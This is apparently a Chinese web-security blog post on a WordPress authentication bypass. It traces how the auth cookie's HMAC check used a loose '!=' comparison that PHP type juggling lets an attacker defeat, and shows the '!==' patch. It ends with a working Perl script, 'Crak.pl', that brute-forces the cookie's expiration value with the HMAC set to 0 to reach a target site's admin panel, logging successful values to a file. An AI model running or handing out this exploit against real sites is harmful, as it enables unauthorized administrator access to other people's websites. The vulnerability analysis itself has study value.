0×00前言 wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1398748782%7C404207f08e7a5f32dcabad2969d6ee28; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1398748782%7Ca09bad0632c45f7295835bcc22f50ba7; wp-settings-time-1=1398577578 其中
wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1398748782%7C404207f08e7a5f32dcabad2969d6ee28; 为认证cookie 其他cookie可有可无, 我们分析下这个cookie的结构 C:\AppServ\www\wordpress\wp-includes\default-constants.php (1 hit) Line 168: define('COOKIEHASH', md5($siteurl) Md5后为BBFA5B726C6B7A9CF3CDA9370BE3EE91 再看这个cookie的值 admin|1398748782|404207f08e7a5f32dcabad2969d6ee28; 格式为$username|$expiration|$hmac $username 为用户名 $key = wp_hash($username . $pass_frag . '|' . $expiration, $scheme); $hash = hash_hmac('md5', $username . '|' . $expiration, $key); if ( $hmac != $hash ) { do_action('auth_cookie_bad_hash', $cookie_elements); return false; } $username,expiration从cookie中取得 $key = wp_hash($username . $pass_frag . '|' . $expiration, $scheme); $hash = hash_hmac('md5', $username . '|' . $expiration, $key); echo '$username:'.$username."<br>"; echo '$pass_frag:'.$pass_frag."<br>"; echo '$expiration:'.$expiration."<br>"; echo '$scheme:'.$scheme."<br>"; echo '$key:'.$key."<br>"; echo '$hash:'.$hash."<br>"; echo '$hmac:'.$hmac."<br>"; exit(); if ( $hmac != $hash ) { do_action('auth_cookie_bad_hash', $cookie_elements); return false; } 即运行到此时 将所有我们好奇的变量打印出来 $username:admin $pass_frag:XBxI $expiration:1398748782 $scheme:auth $key:1002e6cddd0416ac265378aa4ab111f8 $hash:404207f08e7a5f32dcabad2969d6ee28 $hmac:404207f08e7a5f32dcabad2969d6ee28 我们的分析是正确的! $key = wp_hash($username . $pass_frag . '|' . $expiration, $scheme); $hash = hash_hmac('md5', $username . '|' . $expiration, $key); - if ( $hmac != $hash ) { + if ( hash_hmac( 'md5', $hmac, $key ) !== hash_hmac( 'md5', $hash, $key ) ) { 将!=修改成!== $a==$b;// Equal TRUE if $a is equal to $b. $a===$b;// Identical TRUE if $a is equal to $b, and they are of the same type php手册说明如上 ==为非严格比较,会进行类型转换后比对 <?php var_dump(0 == "a"); // 0 == 0 -> true var_dump("1" == "01"); // 1 == 1 -> true var_dump("10" == "1e1"); // 10 == 10 -> true var_dump(100 == "1e2"); // 100 == 100 -> true ?> 以上是手册给出的例子
这个认证cookie中,我们若固定$username的值不变,$hmac固定为0,不断更改$expiration的值,使得
的值不断改变 Crak.pl use LWP::UserAgent; $url="http://localhost/wordpress"; #要攻击的wordpress地址 $sitehash="bbfa5b726c6b7a9cf3cda9370be3ee91"; #$url的md5值 for($i=10000000000;;$i++) #$expiration { my $ua = LWP::UserAgent->new; my $req = HTTP::Request->new('GET' => $url."/wp-admin/"); $req->header('Cookie' => "wordpress_".$sitehash."=admin%7c".$i."%7c0;"); #将cookie设成我们想要的情况 my $res = $ua->request($req); print "wordpress_".$sitehash."=admin%7c".$i."%7c0"."\n"; #将cookie的值打印出来看看 print $i."\t"; print $url."/wp-admin/"."\n"; print $res->status_line."\n"; if(index($res->content,"您好,admin")>0) #如果成功进入后台则记录在D盘下的result.html文件 { open(SH, ">> d:/result.html"); print SH ($i."\n"); } }
|
-
上一篇: 科讯KESION CMS最新版任意文件上传WEBSHELL - 网站安
下一篇: xss零碎指南 - 网站安全 - 自学php
还没有人抢沙发呢~